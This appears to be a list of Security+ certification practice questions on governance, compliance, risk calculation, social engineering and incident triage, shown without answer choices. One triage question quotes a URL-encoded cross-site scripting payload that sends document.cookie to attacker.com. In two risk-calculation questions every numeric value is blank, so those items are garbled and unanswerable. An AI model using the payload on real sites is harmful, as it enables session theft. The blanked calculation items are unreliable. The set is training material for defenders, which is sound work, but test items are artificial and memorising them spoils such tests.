All practice questions
2232 questions
A regional healthcare network is preparing to deploy standard desktop computer images across all administrative workstations. The security engineering team needs to document the mandatory minimum hardening requirements and line-by-line operating system security configurations that every system image must strictly conform to prior to being authorized for network placement. Which of the following governance documents should the security team create to specify these mandatory technical settings?
An online retail business directly processes customer credit card transactions and stores cardholder account information. Which of the following regulatory compliance standards specifically mandates security controls for safeguarding this payment card data?
A fintech company operates a cloud-based API gateway handling micro-transactions, with an estimated Asset Value () of . A risk assessment identifies that unmitigated Distributed Denial of Service (DDoS) attacks have an Exposure Factor () of and an Annualized Rate of Occurrence () of . The organization deploys an automated Web Application Firewall (WAF) that reduces the Exposure Factor to . The total annual operational cost of maintaining the WAF is . What is the net annual financial benefit (in dollars) realized by implementing this security control?
A security analyst is triaging alerts from a Network Intrusion Detection System (NIDS) monitoring incoming web traffic to an internal app server. The NIDS sensor triggered an automated alert categorized as 'Database Manipulation Attempt' after capturing the following HTTP request payload:
`GET /catalog/product.php?id=%3Cscript%3Efetch%28%27http%3A%2F%2Fattacker.com%2Fsteal%3Fcookie%3D%27%2Bdocument.cookie%29%3C%2Fscript%3E HTTP/1.1`
`Host: store.internal.net`
Upon reviewing the log payload, which of the following correctly identifies the actual threat vector present in the capture and the most appropriate remediation measure?
An industrial manufacturing firm operates an edge computing controller managing automated assembly lines, valued at an Asset Value () of . Security assessments indicate an unmitigated Exposure Factor () of () with an Annual Rate of Occurrence () of for hardware failure caused by power anomalies. To reduce risk, the organization evaluates a high-availability failover appliance costing annually, which would lower the Exposure Factor to () without affecting the . What is the net annual financial benefit of implementing this risk mitigation control?
Following an unauthorized intrusion into a server facility, an enterprise security team installs physical key-locked USB port blockers directly onto all exposed server ports to restrict direct hardware access. According to CompTIA Security+ standards, which control category and functional type best describe this security mechanism?
An enterprise security operations center (SOC) discovers that several employees mistakenly submitted their corporate domain credentials to an external login portal. The malicious portal was hosted on `login.acme-corp.net`, whereas the legitimate enterprise single sign-on (SSO) portal is `login.acme-corp.com`. The attacker registered the alternate top-level domain to impersonate the enterprise authentication interface. Which of the following social engineering attack vectors was primarily executed by the attacker?
An organization is establishing a security awareness program to reduce human risk from social engineering tactics. Which of the following initiatives represent core operational components of an effective security awareness and training program? (Select TWO).
Select all that apply
An enterprise risk committee is structuring its organizational governance framework. Match each policy framework document type on the left with its defining enforcement requirement and operational characteristics on the right.
Click a left item, then click its matching right item
Items
Matches
A cloud-native SaaS provider headquartered in Japan processes real-time telemetry, transaction records, and personally identifiable information (PII) for subscribers across the European Union and North America. Following an internal compliance review prior to a public stock listing, the Chief Information Security Officer (CISO) mandates that technical security controls for data handling must satisfy regional privacy laws, data sovereignty requirements, and financial oversight controls. Which of the following governance strategies best aligns the organization's technical controls with these legal and regulatory obligations?
An organization is evaluating security attestation documentation from a prospective software-as-a-service vendor to verify the strength of their operational security posture. The vendor submits both a SOC 2 Type I report and a SOC 2 Type II report. Which of the following statements correctly distinguish the scope and purpose of these two attestation reports? (Select TWO).
Select all that apply
An enterprise security team is categorizing various security controls according to CompTIA Security+ framework classifications. Match each security control implementation on the left with its corresponding control category and functional type on the right.
Click a left item, then click its matching right item
Items
Matches
Following an internal compliance audit that revealed inconsistent server hardening across cloud environments, a technology firm needs to publish a mandatory document defining the minimum required technical security settings—such as disabled protocols and required encryption key lengths—that every system must satisfy before deployment. Which of the following governance document types should the security team establish to enforce these mandatory minimum technical settings?
A Software-as-a-Service (SaaS) platform provider headquartered in the United States expands its human resources management platform to serve client organizations based in the European Union (EU). Which of the following regulatory compliance mandates must the organization implement to fulfill General Data Protection Regulation (GDPR) requirements? (Select TWO.)
Select all that apply
A security analyst managing legacy workstation endpoints in a healthcare facility needs to remediate a critical operating system vulnerability. Vendor patches frequently reset customized local security policies back to default settings, exposing the devices to unauthorized access. Which of the following approaches best maintains system security baselines while ensuring timely vulnerability remediation?
A security analyst is reviewing metric parameters established during an enterprise Business Impact Analysis (BIA). Which of the following statements accurately describe the operational targets set by Recovery Time Objective (RTO) and Recovery Point Objective (RPO)? (Select TWO.)
Select all that apply
A security analyst is establishing a comprehensive vulnerability scanning framework for an enterprise network containing diverse operational environments. Match each vulnerability assessment requirement on the left with the scanner deployment methodology or configuration option on the right that best satisfies it.
Click a left item, then click its matching right item
Items
Matches
A Security Operations Center (SOC) analyst receives a high-priority alert from a Network Intrusion Detection System (NIDS) indicating suspicious outbound traffic from an internal enterprise workstation. Place the following analyst triage and incident response steps in the correct sequence, from initial alert evaluation to containment.
Drag items to arrange them in the correct order
A security analyst is reviewing incident reports from remote staff who experienced a coordinated social engineering campaign. Several employees received text messages on their corporate mobile devices containing links to a counterfeit login portal, while other employees received phone calls from an attacker posing as IT support attempting to obtain credential resets. Which of the following social engineering attack vectors were executed during this incident? (Select TWO.)
Select all that apply
An administrative assistant at a logistics firm receives an urgent text message on their corporate mobile phone from an unverified short code claiming to be the company's Vice President of Operations. The message asserts that a supplier invoice must be authorized immediately via a provided short link to prevent supply chain disruption, warning that delay will result in severe administrative penalty. Which social engineering attack vector and primary influence principle are demonstrated in this scenario?